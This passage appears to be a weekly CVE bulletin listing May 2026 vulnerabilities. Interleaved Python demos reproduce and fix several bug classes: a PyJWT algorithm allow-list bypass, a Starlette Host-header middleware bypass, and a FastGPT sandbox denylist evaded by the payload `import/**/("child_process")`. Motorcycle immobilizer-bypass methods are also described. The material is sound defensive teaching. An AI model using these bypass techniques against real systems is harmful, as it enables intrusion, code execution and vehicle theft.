| IBM--MQ Operator | IBM MQ Operator SC2: v3.2.0 through 3.2.23; CD: v3.3.0, v3.4.0, v3.4.1, v3.5.0, v3.5.1 - v3.5.3, v3.6.0 - v3.6.4, v3.7.0 - v3.7.2, v3.8.0, v3.8.1, v3.9.0, v3.9.1; LTS: v2.0.0 - 2.0.29 and IBM supplied MQ Advanced container images SC2: 9.4.0.6 through r1, 9.4.0.6-r2, 9.4.0.7-r1, 9.4.0.10-r1, 9.4.0.10-r2, 9.4.0.11-r1, 9.4.0.11-r2, 9.4.0.11-r3, 9.4.0.12-r1, 9.4.0.15-r1 - 9.4.0.15-r4, 9.4.0.16-r1, 9.4.0.16-r2, 9.4.0.17-r1, 9.4.0.17-r2, 9.4.0.20-r1; CD: 9.4.1.0-r1, 9.4.1.0-r2, 9.4.1.1-r1, 9.4.2.0-r1, 9.4.2.0-r2, 9.4.2.1-r1, 9.4.2.1-r2, 9.4.3.0-r1, 9.4.3.0-r2, 9.4.3.1-r1 - 9.4.3.1-r3, 9.4.4.0-r1 - 9.4.4.0-r4, 9.4.4.1-r1, 9.4.5.0-r1, 9.4.5.0-r2; LTS: 9.3.0.0-r1, 9.3.0.0-r2, 9.3.0.0-r3, 9.3.0.1-r1, 9.3.0.1-r2, 9.3.0.1-r3, 9.3.0.1-r4, 9.3.0.3-r1, 9.3.0.4-r1, 9.3.0.4-r2, 9.3.0.5-r1, 9.3.0.5-r2, 9.3.0.5-r3, 9.3.0.6-r1, 9.3.0.10-r1, 9.3.0.10-r2, 9.3.0.11-r1, 9.3.0.11-r2, 9.3.0.15-r1, 9.3.0.16-r1, 9.3.0.16-r2, 9.3.0.17-r1, 9.3.0.17-r2, 9.3.0.17-r3, 9.3.0.20-r1, 9.3.0.20-r2, 9.3.0.21-r1, 9.3.0.21-r2, 9.3.0.21-r3, 9.3.0.25-r1, 9.4.0.0-r1, 9.4.0.0-r2, 9.4.0.0-r3, 9.4.0.5-r1, 9.4.0.5-r2 IBM MQ stores potentially sensitive information in log files that could be read by a local user. | 2026-05-27 | 5.1 | CVE-2026-2607 |
| IBM--Operations Analytics - Log Analysis | IBM Operations Analytics - Log Analysis 1.3.5.0, 1.3.5.1, 1.3.5.2, 1.3.5.3, 1.3.6.0, 1.3.6.1, 1.3.7.0, 1.3.7.1, 1.3.7.2, and 1.3.8.0, 1.3.8.1, 1.3.8.2, 1.3.8.3, 1.3.8.4 IBM SmartCloud Analytics - Log Analysis does not require that users should have strong passwords by default, which makes it easier for attackers to compromise user accounts. | 2026-05-27 | 5.9 | CVE-2024-40684 |
| IBM--SDI | IBM SDI 7.2.0.0 through 7.2.0.14 and IBM Security Directory Integrator 10.0.0.0 through 10.0.0.2 could allow a remote attacker to obtain sensitive information when a detailed technical error message is returned in the browser. This information could be used in further attacks against the system. | 2026-05-27 | 5.3 | CVE-2024-28765 |
| IBM--watsonx.data | IBM watsonx.data 2.2 through 2.3.1 IBM Lakehouse does not properly restrict inbound and outbound connections which could allow an attacker to transfer or modify files without restrictions. | 2026-05-26 | 5.4 | CVE-2025-36145 |
| IBM--webMethods Integration (on prem) -Integration Server | IBM webMethods Integration (on prem) -Integration Server 10.15 through IS_10.15_Core_Fix2611.1 to IS_11.1_Core_Fix10 IBM webMethods Integration is vulnerable to server-side request forgery (SSRF). This may allow an authenticated attacker to send unauthorized requests from the system, potentially leading to network enumeration or facilitating other attacks. | 2026-05-26 | 5.4 | CVE-2025-14290 |
| IBM--WebSphere Application Server - Liberty | IBM WebSphere Application Server - Liberty 19.0.0.7 through 26.0.0.5 and IBM WebSphere Application Server 9.0, and 8.5 and WebSphere Application Server Liberty are vulnerable to a denial of service, caused by sending a specially-crafted request. A remote attacker could exploit this vulnerability to cause the server to consume memory resources. | 2026-05-27 | 4.8 | CVE-2026-4410 |
| IBM--WebSphere Application Server - Liberty | IBM WebSphere Application Server - Liberty 22.0.0.11 through 26.0.0.5 IBM WebSphere Application Server Liberty could allow a remote attacker to bypass security under limited conditions by exploiting a specific timing window. | 2026-05-27 | 4.4 | CVE-2026-5516 |
| Indian Motorcycle (Polaris Inc.)--Scout Bobber + Tech | Expected behavior violation in the in-vehicle network of the Indian Motorcycle Scout Bobber + Tech 2025 model year allows an adjacent-network attacker to bypass the motorcycle's anti-theft shutdown by forcing the Wireless Control Module (WCM) into the CAN bus-off state. Using a well-known CAN error-frame injection technique against a periodic WCM transmission, the attacker drives the WCM CAN controller's transmit error counter past the bus-off threshold, after which the WCM stops transmitting all messages, including the shutdown command. Peer ECUs do not interpret WCM silence as a security event and continue normal operation, allowing the motorcycle to be operated despite the immobilizer never having been unlocked. Specific protocol details have been withheld pending vendor remediation. | 2026-05-29 | 4.6 | CVE-2026-49316 |
| Indian Motorcycle (Polaris Inc.)--Scout Bobber + Tech | Weak authentication in the Wireless Control Module (WCM) of the Indian Motorcycle Scout Bobber + Tech 2025 model year allows an adjacent-network attacker with read access to the in-vehicle network to recover the user-set unlock PIN by passively observing a single PIN authentication exchange. The Infotainment Digital Round display computes its response using a non-cryptographic operation rather than a cryptographic challenge-response, so the PIN is mathematically derivable from one captured exchange, defeating the motorcycle's primary user-authentication control. Specific protocol details have been withheld pending vendor remediation. | 2026-05-29 | 4.3 | CVE-2026-49322 |
| Indian Motorcycle (Polaris Inc.)--Scout Bobber + Tech | Weak authentication between the Wireless Control Module (WCM) and the Engine Control Module (ECM) of the Indian Motorcycle Scout Bobber + Tech 2025 model year allows an adjacent-network attacker with read access to the in-vehicle network to recover the per-vehicle ECM immobilizer secret by passively observing a single seed/key exchange. The WCM derives its response using a reversible, non-cryptographic operation rather than a cryptographic challenge-response, so the persistent immobilizer secret can be reconstructed from one captured exchange. With this secret the attacker can authenticate to the ECM independently of the WCM and start the engine, defeating the immobilizer. Specific protocol details have been withheld pending vendor remediation. | 2026-05-29 | 4.3 | CVE-2026-49323 |
| Indian Motorcycle (Polaris Inc.)--Scout Bobber + Tech | Uncontrolled resource consumption in the Wireless Control Module (WCM) of the Indian Motorcycle Scout Bobber + Tech 2025 model year allows an adjacent-network attacker with write access to the in-vehicle network to permanently immobilize the motorcycle. The WCM enforces a brute-force lockout on the immobilizer authentication algorithm, but the lockout counter is reachable by any unauthenticated message, has no session binding, and does not reset on power cycle. An attacker can deliberately trip the lockout with a small number of crafted frames, leaving the bike un-startable until dealer service. Specific thresholds have been withheld pending vendor remediation. | 2026-05-29 | 4.6 | CVE-2026-49324 |
| Indian Motorcycle (Polaris Inc.)--Scout Bobber + Tech | Improper handling of physical conditions in the bike-shutdown control of the Indian Motorcycle Scout Bobber + Tech 2025 model year allows a physical attacker with access to the Wireless Control Module (WCM) wiring harness to bypass the anti-theft shutdown. The WCM signals shutdown to a peer ECU via a falling-edge voltage transition on a dedicated wire pair. The receiving ECU does not distinguish between an active shutdown pulse and an open-circuit / disconnected condition; interrupting the relevant wires leaves the motorcycle fully operable even though the WCM never validated the rider's PIN. Specific connector details have been withheld pending vendor remediation. | 2026-05-29 | 4.6 | CVE-2026-49325 |
| Interinfo--DreamMaker | DreamMaker developed by Interinfo has a Path Traversal vulnerability, allowing unauthenticated remote attackers to read file names under arbitrary paths by exploiting an Absolute Path Traversal vulnerability. | 2026-05-29 | 5.3 | CVE-2026-10075 |
| Interinfo--DreamMaker | DreamMaker developed by Interinfo has an Arbitrary File Read vulnerability, allowing privileged local attackers to exploit Relative Path Traversal to download arbitrary system files. | 2026-05-29 | 4.9 | CVE-2026-10074 |
| ipld--go-ipld-prime | go-ipld-prime is an implementation of the InterPlanetary Linked Data (IPLD) spec interfaces, a batteries-included codec implementations of IPLD for CBOR and JSON, and tooling for basic operations on IPLD objects. Prior to 0.23.0, the DAG-CBOR and DAG-JSON decoders recurse on each nested map or list without a depth limit. A payload containing deeply nested collections causes the decoder to recurse once per level, growing the goroutine stack until the Go runtime terminates the process with a fatal stack overflow (distinct from a recoverable panic). This vulnerability is fixed in 0.23.0. | 2026-05-27 | 6.2 | CVE-2026-42328 |
| ITP Technology--ITS Intelligent SCADA System | ITS Intelligent SCADA System developed by ITP Technology has a Stored Cross-Site Scripting vulnerability, allowing privileged remote attackers to inject persistent JavaScript code that is executed in users' browsers upon page load. | 2026-05-29 | 4.8 | CVE-2026-10057 |
| ITP Technology--ITS Intelligent SCADA System | ITS Intelligent SCADA System developed by ITP Technology has a Stored Cross-Site Scripting vulnerability, allowing privileged remote attackers to inject persistent JavaScript code that is executed in users' browsers upon page load. | 2026-05-29 | 4.8 | CVE-2026-10058 |
| itsourcecode--Courier Management System | A vulnerability was found in itsourcecode Courier Management System 1.0. The affected element is an unknown function of the file /parcel_list.php. Performing a manipulation of the argument s results in sql injection. It is possible to initiate the attack remotely. The exploit has been made public and could be used. | 2026-05-27 | 6.3 | CVE-2026-9607 |
| itsourcecode--Electronic Judging System | A vulnerability was determined in itsourcecode Electronic Judging System 1.0. This issue affects some unknown processing of the file /admin/judges.php. This manipulation of the argument fname causes cross-site scripting. Remote exploitation of the attack is possible. The exploit has been publicly disclosed and may be utilized. | 2026-05-26 | 4.3 | CVE-2026-9527 |
| JeecgBoot--JeecgBoot | A vulnerability was found in JeecgBoot up to 3.9.1. Impacted is the function user.getUsername of the file /sys/user/login/setting/userEdit of the component SysUser. The manipulation of the argument userIdentity results in improper access controls. The attack may be launched remotely. The exploit has been made public and could be used. Upgrading to version 3.9.2 addresses this issue. | 2026-05-26 | 6.3 | CVE-2026-9579 |
| JeecgBoot--JeecgBoot | A vulnerability was identified in JeecgBoot up to 3.9.1. The impacted element is an unknown function of the file /sys/comment/add. Such manipulation leads to improper access controls. The attack can be executed remotely. The exploit is publicly available and might be used. Upgrading to version 3.9.2 resolves this issue. | 2026-05-26 | 6.3 | CVE-2026-9581 |
| JeecgBoot--JeecgBoot | A vulnerability was detected in JeecgBoot up to 3.9.1. This vulnerability affects unknown code of the component AiragModelController. The manipulation of the argument list/queryById results in improper access controls. The attack can be executed remotely. The exploit is now public and may be used. Upgrading to version 3.9.2 resolves this issue. | 2026-05-26 | 4.3 | CVE-2026-9604 |
| jegstudio--Gutenverse WordPress Blocks, Page Builder & Site Editor | The Gutenverse plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 's' parameter in all versions up to, and including, 3.4.6 due to insufficient input sanitization and output escaping. Specifically, the `render_content()` method in `class-search-result-title.php` outputs the value of `get_query_var('s')` directly into the page HTML without applying `esc_html()` or any other escaping function. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages via a crafted URL that execute if a user clicks the link, provided the `gutenverse/search-result-title` block is present on the site's search results template. | 2026-05-27 | 6.1 | CVE-2026-3001 |
| JetBrains--IntelliJ IDEA | In JetBrains IntelliJ IDEA before 2026.1 code execution was possible via template injection in the Copyright plugin | 2026-05-29 | 4.5 | CVE-2026-49382 |
| JetBrains--PyCharm | In JetBrains PyCharm before 2025.3.4 stored XSS in Jupyter notebook Markdown cells was possible | 2026-05-29 | 6.1 | CVE-2026-49384 |
| JetBrains--TeamCity | In JetBrains TeamCity before 2026.1, 2025.11.5 reflected XSS was possible on the repository download page | 2026-05-29 | 6.1 | CVE-2026-49375 |
| JetBrains--TeamCity | In JetBrains TeamCity before 2026.1 there was insufficient username validation in the SAML plugin | 2026-05-29 | 6.5 | CVE-2026-49376 |
| JetBrains--TeamCity | In JetBrains TeamCity before 2026.1 credentials could be exposed in thread names | 2026-05-29 | 6.5 | CVE-2026-49379 |
| JetBrains--TeamCity | In JetBrains TeamCity before 2025.11.2 exposure of sensitive data via default agent parameters was possible | 2026-05-29 | 4.3 | CVE-2026-49377 |
| JetBrains--TeamCity | In JetBrains TeamCity before 2026.1 credentials parameters were exposed via parameter autocompletion | 2026-05-29 | 4.3 | CVE-2026-49378 |
| JetBrains--YouTrack | In JetBrains YouTrack before 2026.1.13570 improper access control allowed low-privileged users to modify service accounts | 2026-05-29 | 6.5 | CVE-2026-49385 |
| JetBrains--YouTrack | In JetBrains YouTrack before 2026.1.13570 improper access control allowed enumeration of restricted issues and articles on Planning Canvas | 2026-05-29 | 6.5 | CVE-2026-49386 |
| JetBrains--YouTrack | In JetBrains YouTrack before 2026.1.13162 information disclosure was possible on Users and Groups pages | 2026-05-29 | 4.3 | CVE-2026-49369 |
| jetmonsters--Timetable and Event Schedule by MotoPress | The Timetable and Event Schedule by MotoPress plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 2.4.16 via the action_get_event_data due to missing validation on a user controlled key. This makes it possible for authenticated attackers, with contributor-level access and above, to enumerate timeslot IDs and read the full WP_Post object - including post_content, post_excerpt, post_status, and post_author - of draft, pending, and private mp-event posts belonging to other users, along with their associated raw timeslot descriptions. | 2026-05-28 | 4.3 | CVE-2026-9228 |
| joeyrush--PHP-SHOP master | PHP-SHOP 1.0 contains a cross-site request forgery vulnerability that allows unauthenticated attackers to add administrative users by crafting malicious HTML forms. Attackers can trick authenticated administrators into visiting a page containing a hidden form that automatically submits POST requests to the users.php endpoint with parameters like name, email, password, and permissions set to admin to create unauthorized admin accounts. | 2026-05-29 | 5.3 | CVE-2018-25397 |
| jonathan-robrecht--Single Mailchimp | The Single Mailchimp plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'single-mailchimp' shortcode in all versions up to, and including, 1.4. This is due to insufficient input sanitization and output escaping on user-supplied shortcode attributes (autocomplete, label, placeholder, btn_text, success_msg, error_msg) which are concatenated directly into HTML output by the single_mailchimp() function in shortcodes.php. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-05-27 | 6.4 | CVE-2026-8868 |
| jpadilla--pyjwt | PyJWT is a JSON Web Token implementation in Python. From 2.9.0 to 2.12.1, there is a verifier-side algorithm allow-list bypass when jwt.decode() or jwt.decode_complete() are called with a PyJWK key. The token header alg is checked against the caller-supplied algorithms allow-list, but signature verification is performed with the algorithm bound to the PyJWK object instead of the header algorithm. An attacker who controls a registered JWK/JWKS private key can sign with a disallowed algorithm, advertise an allowed algorithm in the JWT header, and still be accepted. The issue affects the documented PyJWKClient.get_signing_key_from_jwt(...) flow. This vulnerability is fixed in 2.13.0. | 2026-05-28 | 5.4 | CVE-2026-48523 |
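
Added example (not PyJWT's code): a toy HMAC-only JWS verifier that reproduces the bug class described above. `verify_keybound` mirrors the vulnerable ordering, checking the header `alg` against the allow-list but verifying the signature with the algorithm bound to the key; `verify_strict` additionally requires the header `alg` to match the key's algorithm and uses the header `alg` for verification. The shared secret, claims and algorithm names are constructed for the demo; with HMAC, "controls a registered key" simply means the attacker knows the secret.

```python
import base64
import hashlib
import hmac
import json

# Toy compact-JWS helpers; illustrative code, not PyJWT's implementation.
HMAC_ALGS = {"HS256": hashlib.sha256, "HS384": hashlib.sha384, "HS512": hashlib.sha512}


def b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def b64url_decode(s: str) -> bytes:
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))


def sign(payload: dict, key: bytes, header_alg: str, signing_alg: str) -> str:
    """Build a token whose header advertises header_alg while the signature
    is actually computed with signing_alg (the attacker's trick)."""
    header = b64url(json.dumps({"alg": header_alg, "typ": "JWT"}).encode())
    body = b64url(json.dumps(payload).encode())
    sig = hmac.new(key, f"{header}.{body}".encode(), HMAC_ALGS[signing_alg]).digest()
    return f"{header}.{body}.{b64url(sig)}"


def verify_keybound(token: str, key: bytes, key_alg: str, algorithms: list) -> dict:
    """Vulnerable ordering: the allow-list is checked against the header alg,
    but the MAC is recomputed with the algorithm bound to the key object."""
    h, b, s = token.split(".")
    header_alg = json.loads(b64url_decode(h))["alg"]
    if header_alg not in algorithms:
        raise ValueError("alg not allowed")
    expected = hmac.new(key, f"{h}.{b}".encode(), HMAC_ALGS[key_alg]).digest()
    if not hmac.compare_digest(expected, b64url_decode(s)):
        raise ValueError("bad signature")
    return json.loads(b64url_decode(b))


def verify_strict(token: str, key: bytes, key_alg: str, algorithms: list) -> dict:
    """Hardened: header alg must be allowed AND equal the key's bound alg,
    and the header alg is the one used for verification."""
    h, b, s = token.split(".")
    header_alg = json.loads(b64url_decode(h))["alg"]
    if header_alg not in algorithms:
        raise ValueError("alg not allowed")
    if header_alg != key_alg:
        raise ValueError("header alg does not match key alg")
    expected = hmac.new(key, f"{h}.{b}".encode(), HMAC_ALGS[header_alg]).digest()
    if not hmac.compare_digest(expected, b64url_decode(s)):
        raise ValueError("bad signature")
    return json.loads(b64url_decode(b))


def demo() -> dict:
    """Key is registered as HS512; the verifier's allow-list permits only HS256."""
    key = b"constructed-shared-secret"  # constructed demo secret
    token = sign({"sub": "alice"}, key, header_alg="HS256", signing_alg="HS512")
    results = {}
    for name, fn in (("keybound", verify_keybound), ("strict", verify_strict)):
        try:
            results[name] = fn(token, key, "HS512", ["HS256"])
        except ValueError as exc:
            results[name] = str(exc)
    return results
```

The point to take away: an `algorithms` allow-list only protects you if the algorithm it is checked against is the one actually used for verification. When a key object carries its own `alg`, the verifier must reject any token whose header disagrees with it.

| Primary Vendor -- Product | Description | Published | CVSS Score | Source Info |
|---|---|---|---|---|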
| jpadilla--pyjwt | PyJWT is a JSON Web Token implementation in Python. From 2.8.0 to 2.12.1, when verifying detached JWS tokens using the unencoded-payload option ("b64": false, RFC 7797), PyJWT performs Base64URL decoding of the compact-serialization payload segment before enforcing the detached-payload rules. For b64=false, PyJWT later discards that decoded payload and replaces it with the caller-provided detached_payload. In practice, this turns the middle segment into an attacker-controlled "work amplifier": a remote client can supply an arbitrarily large Base64URL payload segment that forces CPU work + memory allocations even if the signature is invalid. This creates an unauthenticated DoS vector against any endpoint that verifies detached JWS using PyJWT. This vulnerability is fixed in 2.13.0. | 2026-05-28 | 5.3 | CVE-2026-48525 |
| jpadilla--pyjwt | PyJWT is a JSON Web Token implementation in Python. Prior to 2.13.0, PyJWKClient passes its uri argument directly to urllib.request.urlopen() which uses Python stdlib's default OpenerDirector registering HTTPHandler, HTTPSHandler, FTPHandler, FileHandler, and DataHandler. There is currently no documented option to restrict which schemes PyJWKClient will fetch. If an application's jku URL ingestion path accepts attacker-influenced URLs (e.g., from JWT header, configuration file, OAuth flow parameter), the attacker can cause PyJWKClient to read arbitrary local files via file:// (SSRF on local filesystem), cause PyJWKClient to attempt FTP / data-URI fetches (broader SSRF surface), or forge tokens that PyJWT verifies as valid. The library does not directly return non-HTTP(S) URI contents to the attacker; the chained "plant a JWKS to forge tokens" scenario described in the original report requires additional application-layer flaws (attacker write access to a filesystem path, untrusted jku derivation) that this fix does not address. This vulnerability is fixed in 2.13.0. | 2026-05-28 | 4.2 | CVE-2026-48522 |
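
Added example (not PyJWT's code): the pre-flight check an application should run on a JWKS URL before handing it to a fetcher built on `urllib.request.urlopen()`. `default_opener_handler_names()` shows that urllib's default opener does register `FileHandler`, `FTPHandler` and `DataHandler`, so scheme pinning has to happen in the caller. `validate_jwks_url()` pins scheme and host and rejects userinfo tricks; the host allow-list and the URLs used in the test are constructed.

```python
import urllib.request
from urllib.parse import urlparse


def default_opener_handler_names() -> set:
    """Handler classes urllib registers when no opener is installed.
    FileHandler/FTPHandler/DataHandler are among them, so a bare urlopen()
    will follow file://, ftp:// and data: URLs."""
    return {type(h).__name__ for h in urllib.request.build_opener().handlers}


def validate_jwks_url(url: str, allowed_hosts, allowed_schemes=("https",)) -> str:
    """Constructed check: only https, only a pinned set of hosts, no userinfo.
    Returns the URL unchanged when it passes, raises ValueError otherwise."""
    parts = urlparse(url)
    if parts.scheme.lower() not in allowed_schemes:
        raise ValueError(f"disallowed scheme {parts.scheme!r}")
    if parts.username or parts.password:
        # "https://idp.example.org@evil.example.net/" style confusion
        raise ValueError("userinfo not allowed in JWKS URL")
    if parts.hostname not in allowed_hosts:
        raise ValueError(f"host {parts.hostname!r} not in allow-list")
    return url


def fetch_jwks(url: str, allowed_hosts, timeout: float = 5.0) -> bytes:
    """Validate first, then fetch. Never derive `url` from the token's own
    header (jku) without this check; the allow-list is what makes it safe."""
    validate_jwks_url(url, allowed_hosts)
    with urllib.request.urlopen(url, timeout=timeout) as resp:  # network call
        return resp.read()
```

`fetch_jwks()` is shown for completeness and performs a real network request; the test exercises only the validation logic.

| Primary Vendor -- Product | Description | Published | CVSS Score | Source Info |
|---|---|---|---|---|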
| json-2-csv--json-2-csv | Versions of the package json-2-csv from 3.15.0 and before 5.5.11 are vulnerable to CSV Injection via the preventCsvInjection option which can be bypassed. An attacker can inject formulas into CSV files, which execute when the files are opened in spreadsheet applications. | 2026-05-28 | 6.8 | CVE-2026-9673 |
| juliangruber--brace-expansion | The brace-expansion library generates arbitrary strings containing a common prefix and suffix. From 5.0.0 to before 5.0.6, the max option was applied too late. When expanding a single large numeric range like {1..10000000}, the sequence generation loop generates all 10 million intermediate elements before the max limit is applied. With max=10, the output is correctly limited to 10 items, but the process still allocates ~505 MB and spends ~800ms building the full intermediate array. This vulnerability is fixed in 5.0.6. | 2026-05-29 | 6.5 | CVE-2026-45149 |
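
Added example (not the brace-expansion library's code): the two orderings side by side for a bash-style `{start..end..step}` numeric range. `expand_eager` materialises the whole sequence and truncates afterwards, which is the shape of the flaw; `expand_bounded` applies the cap inside the generator so the work done is proportional to `min(n, max)`. Both return the number of elements they actually built so the difference is measurable rather than just asserted.

```python
import itertools


def numeric_range(start: int, end: int, step: int = 1):
    """Lazily yield the integers of {start..end..step}, descending when
    start > end, as brace expansion does. step=0 is treated as 1."""
    step = abs(step) or 1
    i = start
    if start <= end:
        while i <= end:
            yield i
            i += step
    else:
        while i >= end:
            yield i
            i -= step


def expand_eager(start, end, step=1, max_items=None):
    """Flawed ordering: build the full array, then slice to max_items.
    Returns (items, elements_materialised)."""
    items = [str(i) for i in numeric_range(start, end, step)]
    materialised = len(items)
    if max_items is not None:
        items = items[:max_items]
    return items, materialised


def expand_bounded(start, end, step=1, max_items=None):
    """Correct ordering: the cap is enforced while generating, so a huge
    range with a small max never allocates more than max_items strings."""
    gen = (str(i) for i in numeric_range(start, end, step))
    if max_items is not None:
        gen = itertools.islice(gen, max_items)
    items = list(gen)
    return items, len(items)
```

The general lesson applies to any "limit" option on an expansion or decoder: enforce it on the hot path, not as a post-filter, or an unauthenticated input can still drive memory and CPU to the uncapped bound.

| Primary Vendor -- Product | Description | Published | CVSS Score | Source Info |
|---|---|---|---|---|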
| Justin Kruit--Advanced Custom Fields: Font Awesome Field | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Justin Kruit Advanced Custom Fields: Font Awesome Field allows Stored XSS. This issue affects Advanced Custom Fields: Font Awesome Field: from n/a through 5.0.2. | 2026-05-27 | 6.5 | CVE-2026-49044 |
| kevin1804--Responsive Check | The Responsive Check plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'rspcheck' shortcode in versions up to, and including, 0.0.3. This is due to insufficient input sanitization and output escaping on the 'url' (and 'button') shortcode attributes in the rspc_check_shortcode() function, which are echoed directly into iframe src attributes without esc_attr() or esc_url(). This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-05-27 | 6.4 | CVE-2026-8844 |
| Kings Plugins--B2BKing | Missing Authorization vulnerability in Kings Plugins B2BKing allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects B2BKing: from n/a before 5.2.10. | 2026-05-25 | 4.9 | CVE-2026-27346 |
| KLiK --KLiK SocialMediaWebsite | A vulnerability was found in KLiK SocialMediaWebsite 1.0. This affects an unknown part of the component HTTP GET Request Parameter Handler. The manipulation results in injection. It is possible to launch the attack remotely. The exploit has been made public and could be used. | 2026-05-25 | 6.3 | CVE-2026-9420 |
| Kludex--starlette | Starlette is a lightweight ASGI framework/toolkit. Prior to version 1.0.1, the HTTP `Host` request header was not validated before being used to reconstruct `request.url`. Because the routing algorithm relies on the raw HTTP path while `request.url` is rebuilt from the `Host` header, a malformed header could make `request.url.path` differ from the path that was actually requested. Middleware and endpoints that apply security restrictions based on `request.url` (rather than the raw `scope` path) could therefore be bypassed. Users should upgrade to a version greater than or equal to version 1.0.1, which validates the `Host` header against the grammar of RFC 9112 §3.2 / RFC 3986 §3.2.2 when constructing `request.url` and falls back to `scope["server"]` for malformed values. | 2026-05-26 | 6.5 | CVE-2026-48710 |
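
Added example (not Starlette's code): how a URL rebuilt from an unvalidated `Host` header can disagree with the raw request path, and why a middleware keyed on the rebuilt URL is bypassable. `rebuild_url` concatenates scheme, `Host` and raw path the way a framework might; `is_admin_request` is a constructed middleware that gates `/admin` on the rebuilt path. The `Host` value `example.com/public?` is constructed for the demo, and `_HOST_RE` is an approximation of the RFC 3986 §3.2.2 host grammar plus an optional port, used here to fall back to the server address the way the fix describes.

```python
import re
from urllib.parse import urlsplit

# Approximation of RFC 3986 host (IP-literal / IPv4address / reg-name) with an
# optional ":port". It deliberately rejects "/", "?", "#" and "@".
_HOST_RE = re.compile(
    r"^(?:\[[0-9A-Fa-f:.]+\]|[A-Za-z0-9\-._~%!$&'()*+,;=]+)(?::[0-9]*)?$"
)


def host_is_valid(host: str) -> bool:
    return bool(_HOST_RE.match(host))


def rebuild_url(scheme: str, host: str, raw_path: str,
                fallback_host: str = "127.0.0.1:8000", validate: bool = False) -> str:
    """Rebuild the request URL from the Host header. With validate=True a
    malformed Host is replaced by the server's own address (constructed fallback)."""
    if validate and not host_is_valid(host):
        host = fallback_host
    return f"{scheme}://{host}{raw_path}"


def url_path(scheme: str, host: str, raw_path: str, validate: bool = False) -> str:
    """What request.url.path would report after the rebuild."""
    return urlsplit(rebuild_url(scheme, host, raw_path, validate=validate)).path


def is_admin_request(scheme: str, host: str, raw_path: str, validate: bool = False) -> bool:
    """Constructed middleware that (wrongly) decides on the rebuilt URL path
    instead of the raw scope path."""
    return url_path(scheme, host, raw_path, validate).startswith("/admin")


def demo() -> dict:
    raw_path = "/admin/secret"           # what the router will actually dispatch
    evil_host = "example.com/public?"    # constructed malformed Host header
    return {
        "router_sees": raw_path,
        "middleware_sees": url_path("http", evil_host, raw_path),
        "blocked_without_validation": is_admin_request("http", evil_host, raw_path),
        "blocked_with_validation": is_admin_request("http", evil_host, raw_path, validate=True),
    }
```

With the malformed header the rebuilt URL becomes `http://example.com/public?/admin/secret`, so the middleware sees path `/public` and lets the request through while the router dispatches `/admin/secret`. Two independent fixes apply: validate (or replace) `Host` before rebuilding, and make authorization decisions on the raw `scope["path"]` rather than on a reconstructed URL.

| Primary Vendor -- Product | Description | Published | CVSS Score | Source Info |
|---|---|---|---|---|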
| konforti--Listen Shortcode | The Listen Shortcode plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'listen' shortcode in versions up to, and including, 1.0. This is due to insufficient input sanitization and output escaping on user supplied attributes (src, start, end) in the listenEmbedJS() function, which are echoed inside a single-quoted HTML attribute without escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-05-27 | 6.4 | CVE-2026-8887 |
| LabRedesCefetRJ--WeGIA | WeGIA is a web manager for charitable institutions. In versions prior to 3.7.3, when a user logs in, html/login.php hashes the submitted password using PHP's hash() function with the SHA-256 algorithm and no salt before comparing it to the stored value. The password change flow in controle/FuncionarioControle.php follows the same pattern. SHA-256 is a general-purpose cryptographic hash built for speed, not password storage. Without a salt, identical passwords produce identical digests, making the entire hash database vulnerable to a single precomputed rainbow table lookup. This vulnerability is fixed in 3.7.3. | 2026-05-27 | 5.9 | CVE-2026-45027 |
| LabRedesCefetRJ--WeGIA | WeGIA is a web manager for charitable institutions. Prior to 3.7.3, an Open Redirect vulnerability was identified in the /WeGIA/controle/control.php endpoint of the WeGIA application, specifically through the nextPage parameter when combined with metodo=listarTodos and nomeClasse=InternoControle. The application fails to validate or restrict the nextPage parameter, allowing attackers to redirect users to arbitrary external websites. This can be abused for phishing attacks, credential theft, malware distribution, and social engineering using the trusted WeGIA domain. This vulnerability is fixed in 3.7.3. | 2026-05-27 | 5.4 | CVE-2026-45335 |
| labring--FastGPT | FastGPT is an AI Agent building platform. Prior to 4.15.0-beta1, the JavaScript sandbox worker at projects/code-sandbox/src/pool/worker.ts:356 blocks dynamic import() with the regex /\bimport\s*\(/.test(code). JavaScript syntax accepts a block comment between import and (; the regex matches only ASCII whitespace, and the bytes /, *, *, / are not in the \s character class. The payload import/**/("child_process") parses as a syntactically valid dynamic import that the regex does not detect. Because import() is not wrapped by the safeRequire Proxy (which only proxies require), the attacker loads child_process and calls execSync - arbitrary command execution as uid=100(sandbox) inside the sandbox container. This vulnerability is fixed in 4.15.0-beta1. | 2026-05-29 | 6.3 | CVE-2026-44287 |
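
Added example (not FastGPT's code): the denylist regex from the entry next to a constructed variant that tolerates JavaScript comments between `import` and `(`, plus a comment-stripping pass. Python's `re` has the same `\s` and `\b` semantics as the JavaScript pattern, so the bypass reproduces exactly. The payload strings are the ones described above; the hardened patterns are this example's own and are still a denylist, so treat them as a demonstration of why source-text filtering is fragile rather than as a sandbox fix.

```python
import re

# The pattern described in the advisory: only ASCII whitespace may sit between
# the keyword and the opening parenthesis.
NAIVE_IMPORT_RE = re.compile(r"\bimport\s*\(")

# Constructed hardened variants for the demo.
_COMMENT_RE = re.compile(r"/\*.*?\*/|//[^\n]*", re.S)
TOLERANT_IMPORT_RE = re.compile(r"\bimport(?:\s|/\*.*?\*/|//[^\n]*\n)*\(", re.S)


def naive_blocks_dynamic_import(code: str) -> bool:
    """True when the advisory's regex would reject the snippet."""
    return bool(NAIVE_IMPORT_RE.search(code))


def strip_js_comments(code: str) -> str:
    """Replace block and line comments with a space. Note: this does not
    understand string literals, so it is a heuristic, not a tokenizer."""
    return _COMMENT_RE.sub(" ", code)


def hardened_blocks_dynamic_import(code: str) -> bool:
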